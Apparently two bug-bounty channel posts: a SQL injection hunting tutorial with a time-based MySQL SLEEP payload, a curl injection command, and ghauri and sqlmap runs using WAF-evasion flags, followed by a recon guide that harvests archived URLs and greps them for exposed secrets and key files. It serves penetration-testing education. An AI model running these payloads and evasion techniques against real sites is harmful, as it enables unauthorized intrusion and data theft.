A Simple Yet Effective Way to Find SQLi Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLi) vulnerabilities. Here’s a streamlined approach:
1. Extract Potential Targets
Use waybackurls to pull historical URLs with query parameters from the Wayback Machine:
waybackurls target.com | grep '?id='
This surfaces old endpoints that may still be live and vulnerable.
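To keep the whole parameter surface (not just ?id=) for later steps, the same pipe can be wrapped in a small filter — a sketch; extract_params and params.txt are names invented here:

```shell
#!/bin/sh
# Filter a URL list down to unique, parameterized URLs.
# Reads URLs on stdin, e.g. piped from: waybackurls target.com
extract_params() {
    grep '=' | sort -u
}

# Example: waybackurls target.com | extract_params > params.txt
```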
━━━━━━━━━━━━━━━━━━
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
This payload targets MySQL/MariaDB (other databases need different time functions). If the response is consistently delayed by ~8 seconds while a baseline request is not, the parameter is likely injectable.
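One way to check the delay from the command line is to time the request against a baseline — a sketch assuming the example target URL and the 8-second SLEEP from the payload above:

```shell
#!/bin/sh
# Time a command and print the elapsed whole seconds.
elapsed() {
    start=$(date +%s)
    "$@" > /dev/null 2>&1
    echo $(( $(date +%s) - start ))
}

# Compare a baseline request with the payload (commented out --
# needs a live target; URL and parameter are from the example):
# base=$(elapsed curl -sG "https://target.com/page.php" --data-urlencode "id=1")
# t=$(elapsed curl -sG "https://target.com/page.php" \
#       --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -")
# [ $((t - base)) -ge 8 ] && echo "likely injectable"
```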
━━━━━━━━━━━━━━━━━━
3. Manual Testing with cURL
curl -G "https://target.com/page.php" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
• -G appends the --data-urlencode value to the query string (URL-encoded), so the payload actually reaches the id parameter instead of being sent as a request body.
• The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
• Modify headers like User-Agent to mimic real traffic.
━━━━━━━━━━━━━━━━━━
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Waits 5 seconds between requests to reduce the chance of rate-based blocking.
--technique=BEST: A character set, not a "best" mode — enables the Boolean (B), Error (E), Stacked-query (S), and Time-based (T) techniques.
--level=3: Runs the deeper test set for better detection.
--prefix="/**/": Prepends an inline SQL comment to each payload to slip past simple WAF filters.
--suffix="-- -": Terminates each payload with a SQL comment.
--safe-chars="[]": Keeps the [ and ] characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Keeps scanning even when the server responds 403 Forbidden.
━━━━━━━━━━━━━━━━━━
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
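With the candidate URLs from step 1 saved to a file, either scanner can be driven in a loop. A sketch — scan_list is a helper invented here, and SCANNER defaults to a harmless dry run so the plumbing can be checked before pointing it at the real ghauri or sqlmap command line:

```shell
#!/bin/sh
# scan_list: run a scanner against each URL in a file, one at a time.
# SCANNER defaults to a dry run; override it with the ghauri or
# sqlmap invocation from above, e.g.:
#   SCANNER="ghauri --batch -u" scan_list targets.txt
SCANNER=${SCANNER:-"echo DRY-RUN"}

scan_list() {
    while IFS= read -r url; do
        $SCANNER "$url"
    done < "$1"
}

# Example: scan_list targets.txt
```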
━━━━━━━━━━━━━━━━━━
Conclusion
✅ Wayback Machine helps find old endpoints.
✅ Manual payloads help confirm basic SQL injection.
✅ Ghauri & SQLMap provide automation with WAF bypass techniques.
━━━━━━━━━━━━━━━━━━
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypass
These commands and URLs gather and analyze data about a specific domain (example.com in the examples). The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1️⃣ Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
•This query retrieves all archived URLs of example.com from Wayback Machine.
•*.example.com/* searches for all subdomains and pages.
•collapse=urlkey removes duplicate URLs.
•output=text formats the output as plain text.
•fl=original extracts only the original URLs without extra metadata.
━━━━━━━━━━━━━━━━━━
2️⃣ Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
•Retrieves a security report for example.com from VirusTotal.
•This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
•Replace YOUR_API_KEY with a valid VirusTotal API key.
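A minimal way to script that request — vt_url is a helper invented here, and detected_urls is the v2 response field assumed to hold the flagged URLs:

```shell
#!/bin/sh
# vt_url builds the VirusTotal v2 domain-report request URL.
vt_url() {
    echo "https://www.virustotal.com/vtapi/v2/domain/report?apikey=$1&domain=$2"
}

# Fetch and pull out the flagged URLs (commented out -- needs a real
# API key, network access, and jq):
# curl -s "$(vt_url "$VT_API_KEY" example.com)" | jq '.detected_urls'
```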
━━━━━━━━━━━━━━━━━━
3️⃣ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
•Queries AlienVault OTX for URLs associated with domain.com.
•limit=500 retrieves up to 500 URLs per page.
•page=1 fetches the first page of results.
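To collect every page rather than just the first, the page parameter can be incremented until the API reports no more results — a sketch; otx_url is a helper invented here, and the url_list/has_next field names are assumptions about the OTX response shape:

```shell
#!/bin/sh
# otx_url builds the url_list request URL for a domain and page.
otx_url() {
    echo "https://otx.alienvault.com/api/v1/indicators/hostname/$1/url_list?limit=500&page=$2"
}

# Pagination loop (commented out -- needs network access and jq):
# page=1
# while :; do
#     resp=$(curl -s "$(otx_url domain.com "$page")")
#     printf '%s' "$resp" | jq -r '.url_list[].url' >> otx_urls.txt
#     [ "$(printf '%s' "$resp" | jq '.has_next')" = "true" ] || break
#     page=$((page + 1))
# done
```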
━━━━━━━━━━━━━━━━━━
4️⃣ Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
•Fetches all archived URLs of example.com from Wayback Machine.
•Saves the output to out.txt for further processing.
━━━━━━━━━━━━━━━━━━
5️⃣ Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1. cat out.txt → Reads the archived URLs from out.txt.
2. uro → Deduplicates and normalizes URLs.
3. grep -E → Uses a regular expression to extract potentially sensitive files, such as:
•Database files: .sql, .db, .backup
•Documents: .xls, .xlsx, .doc, .pdf, .txt
•Compressed archives: .zip, .tar.gz, .rar, .7z
•Encryption keys: .pem, .crt, .key, .asc
•Configuration files: .config, .ini, .yaml, .yml
•Executable files: .exe, .dll, .apk, .msi
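One caveat: the unanchored alternation also matches extensions inside longer names (e.g. \.sql matches .sqlite). Anchoring the match to the end of the path tightens it — a sketch with an abridged extension list; only_sensitive is a name invented here:

```shell
#!/bin/sh
# only_sensitive: keep URLs whose path ends in a sensitive extension,
# optionally followed by a query string, so ".sql" no longer matches
# ".sqlite" or "sql-tutorial.html". Extend the list as in the full
# command above.
only_sensitive() {
    grep -Ei '\.(sql|db|bak|backup|zip|tar\.gz|7z|rar|log|ini|ya?ml|config|pem|crt|key|asc|xlsx?|docx?|pdf|txt)(\?|$)'
}

# Example: cat out.txt | uro | only_sensitive
```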
━━━━━━━━━━━━━━━━━━
🔍 Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1. Fetching archived URLs from the Wayback Machine.
2. Checking for malicious activity on VirusTotal and AlienVault.
3. Filtering sensitive files using grep and uro.